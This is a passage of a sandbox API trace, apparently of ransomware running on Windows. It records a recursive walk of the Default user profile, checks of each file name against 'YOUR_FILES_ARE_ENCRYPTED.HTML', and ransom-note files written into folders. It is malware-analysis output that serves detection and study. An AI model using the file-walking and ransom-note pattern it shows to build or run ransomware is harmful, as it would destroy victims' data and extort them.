PathFindExtensionW (pszPath="NTUSER.DAT.LOG1") returned=".LOG1" [0171.360] lstrlenW (lpString=".LOG1") returned 5 [0171.360] PathFindExtensionW (pszPath="NTUSER.DAT.LOG1") returned=".LOG1" [0171.360] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4ef6cd7a, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x4ef6cd7a, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x4ef6cd7a, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0171.360] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0171.360] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.360] PathFindExtensionW (pszPath="NTUSER.DAT.LOG2") returned=".LOG2" [0171.360] lstrlenW (lpString=".LOG2") returned 5 [0171.360] PathFindExtensionW (pszPath="NTUSER.DAT.LOG2") returned=".LOG2" [0171.360] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5bbcea65, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0x5bbcea65, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0x5bfd2f8c, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0171.360] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf") returned 76 [0171.360] lstrcmpW (lpString1="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.361] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf") returned=".blf" [0171.361] lstrlenW (lpString=".blf") returned 4 [0171.361] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf") returned=".blf" [0171.361] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5bc8d146, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0x5bc8d146, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0x5bface2c, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0171.361] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0171.361] lstrcmpW (lpString1="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.361] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0171.361] lstrlenW (lpString=".regtrans-ms") returned 12 [0171.361] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0171.361] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5bd71988, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0x5bd71988, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0x5bfd2f8c, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0171.361] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0171.361] lstrcmpW (lpString1="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.361] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0171.361] lstrlenW (lpString=".regtrans-ms") returned 12 [0171.361] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0171.361] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc8e9ac0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b50453a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0171.361] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0171.361] lstrcmpW (lpString1="ntuser.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.361] PathFindExtensionW (pszPath="ntuser.ini") returned=".ini" [0171.361] lstrlenW (lpString=".ini") returned 4 [0171.362] PathFindExtensionW (pszPath="ntuser.ini") returned=".ini" [0171.362] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Pictures", cAlternateFileName="")) returned 1 [0171.362] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures") returned 29 [0171.362] GetProcessHeap () returned 0x270000 [0171.362] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.362] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Pictures" | out: lpString1="\\\\?\\C:\\Users\\Default\\Pictures") returned="\\\\?\\C:\\Users\\Default\\Pictures" [0171.362] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Pictures\\*") returned="\\\\?\\C:\\Users\\Default\\Pictures\\*" [0171.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.383] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.383] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.383] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini") returned 41 [0171.383] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.383] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.383] lstrlenW (lpString=".ini") returned 4 [0171.383] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.383] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.384] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.384] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0171.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.385] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.387] CloseHandle (hObject=0x5a0) returned 1 [0171.387] GetProcessHeap () returned 0x270000 [0171.389] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.389] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175ece7c, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175ece7c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175ece7c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0171.389] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\PrintHood") returned 30 [0171.389] GetProcessHeap () returned 0x270000 [0171.389] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.389] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\PrintHood" | out: lpString1="\\\\?\\C:\\Users\\Default\\PrintHood") returned="\\\\?\\C:\\Users\\Default\\PrintHood" [0171.389] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\PrintHood", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\PrintHood\\*") returned="\\\\?\\C:\\Users\\Default\\PrintHood\\*" [0171.389] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.389] GetProcessHeap () returned 0x270000 [0171.390] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.390] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175ece7c, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175ece7c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175ece7c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Recent", cAlternateFileName="")) returned 1 [0171.390] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Recent") returned 27 [0171.390] GetProcessHeap () returned 0x270000 [0171.390] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.390] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Recent" | out: lpString1="\\\\?\\C:\\Users\\Default\\Recent") returned="\\\\?\\C:\\Users\\Default\\Recent" [0171.390] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Recent", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Recent\\*") returned="\\\\?\\C:\\Users\\Default\\Recent\\*" [0171.390] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Recent\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.391] GetProcessHeap () returned 0x270000 [0171.391] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.391] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f74bcf, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0171.391] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games") returned 32 [0171.391] GetProcessHeap () returned 0x270000 [0171.391] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.391] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Saved Games" | out: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games") returned="\\\\?\\C:\\Users\\Default\\Saved Games" [0171.391] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games\\*") returned="\\\\?\\C:\\Users\\Default\\Saved Games\\*" [0171.391] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f74bcf, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.392] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f74bcf, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.392] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f74bcf, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.392] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini") returned 44 [0171.392] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.392] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.392] lstrlenW (lpString=".ini") returned 4 [0171.392] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.392] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f74bcf, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.392] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.392] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0171.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\saved games\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.393] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.396] CloseHandle (hObject=0x5a0) returned 1 [0171.396] GetProcessHeap () returned 0x270000 [0171.397] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.397] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Searches", cAlternateFileName="")) returned 1 [0171.397] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches") returned 29 [0171.397] GetProcessHeap () returned 0x270000 [0171.397] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.397] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Searches" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches") returned="\\\\?\\C:\\Users\\Default\\Searches" [0171.397] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Searches", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches\\*") returned="\\\\?\\C:\\Users\\Default\\Searches\\*" [0171.397] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.502] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.502] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.502] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini") returned 41 [0171.503] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.503] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.503] lstrlenW (lpString=".ini") returned 4 [0171.503] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.503] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0171.503] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms") returned 50 [0171.503] lstrcmpW (lpString1="Everywhere.search-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.503] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0171.503] lstrlenW (lpString=".search-ms") returned 10 [0171.503] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0171.503] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0171.503] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms") returned 57 [0171.503] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.503] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" 